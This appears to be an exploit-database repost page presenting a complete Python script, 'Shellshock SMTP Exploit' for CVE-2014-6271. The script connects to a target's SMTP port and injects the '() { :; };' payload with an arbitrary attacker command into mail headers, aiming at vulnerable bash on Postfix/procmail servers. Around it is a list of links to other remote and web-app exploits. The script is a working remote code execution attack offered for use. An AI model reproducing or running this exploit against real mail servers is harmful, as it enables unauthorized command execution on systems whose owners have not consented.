Apache mod_cgi – Remote Exploit (Shellshock)
All posts by Nerdy Support
[remote] – Postfix SMTP – Shellshock Exploit
Postfix SMTP – Shellshock Exploit
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271

from socket import *
import sys

def usage():
    print "shellshock_smtp.py"

argc = len(sys.argv)
if(argc < 3 or argc > 3):
    usage()
    sys.exit(0)

rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]

headers = ([
    "To",
    "References",
    "Cc",
    "Bcc",
    "From",
    "Subject",
    "Date",
    "Message-ID",
    "Comments",
    "Keywords",
    "Resent-Date",
    "Resent-From",
    "Resent-Sender"
])

s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))

# banner grab
s.recv(2048*4)

def netFormat(d):
    d += "\n"
    return d.encode('hex').decode('hex')

data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)

data = netFormat("rcpt to: ")
s.send(data)
s.recv(2048*4)

data = netFormat("data")
s.send(data)
s.recv(2048*4)

data = ''
for h in headers:
    data += netFormat(h + ":() { :; };" + cmd)

data += netFormat(cmd)

# .
data += "0d0a2e0d0a".decode('hex')

s.send(data)
s.recv(2048*4)

data = netFormat("quit")
s.send(data)
s.recv(2048*4)
[webapps] – Bash – CGI RCE (MSF) Shellshock Exploit
[remote] – OpenVPN 2.2.29 – ShellShock Exploit
[papers] – Remote code exploitation: a very effective technique
[remote] – ManageEngine OpManager / Social IT Arbitrary File Upload
[remote] – HP Network Node Manager I PMD Buffer Overflow
[webapps] – Moab < 7.2.9 – Authorization Bypass
[webapps] – Epicor Enterprise 7.4 – Multiple Vulnerabilities